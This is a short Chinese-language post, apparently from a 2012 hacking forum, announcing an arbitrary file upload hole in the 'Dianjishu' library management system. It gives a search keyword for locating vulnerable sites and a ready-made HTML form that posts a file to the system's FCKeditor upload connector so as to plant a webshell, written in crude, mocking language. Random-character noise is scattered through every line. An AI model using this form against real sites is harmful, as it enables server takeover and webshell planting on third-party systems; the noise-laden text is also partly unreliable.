主题:图书馆系统任意文件上传漏洞* a. A! p3 j0 ~3 |
作者:冰锋刺客
9 N9 o: f7 b2 c 厂商:点击书(dianjishu.com)9 k4 @3 }8 U$ C7 r
日期:2012-6-21! U* H' W4 d' u0 Z3 ` J
- o/ T* o6 m2 `6 w! ]/ v
I 概述
# L% L/ C' G& F2 {2 T) a 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell: B Y3 O% B6 u, j9 ^/ O+ }# @) S7 x
II 简介
- q5 s: z2 B' ^) l6 a! s# | 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"" E @$ ]+ `% j6 ]! ?% Z2 X ~
补充一个漏洞
# y, z) [8 e" O( A! f$ O <form id="frmUpload" enctype="multipart/form-data"
% _ ~* r0 t( h) w M ?+ L# j9 m action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
8 b& C% T. K& X% o8 Q( C' ] <input id="btnUpload" type="submit" value="操翻他">" E5 j+ n& `+ e* ]9 Q% j" m
</form>
( d3 S& \: `' }9 \" P 你们懂的
% x3 |" Z- L5 D! i+ ]! [4 D 那傻逼提供还需要改包. \5 `: I& M2 F( o+ f- J
自己看了下源代码发现fckeditor
/ G) d( ` s1 n9 w: d5 S- } 直接秒杀; M3 I. ]" d, [0 V# @& B. V5 m7 ?. O
|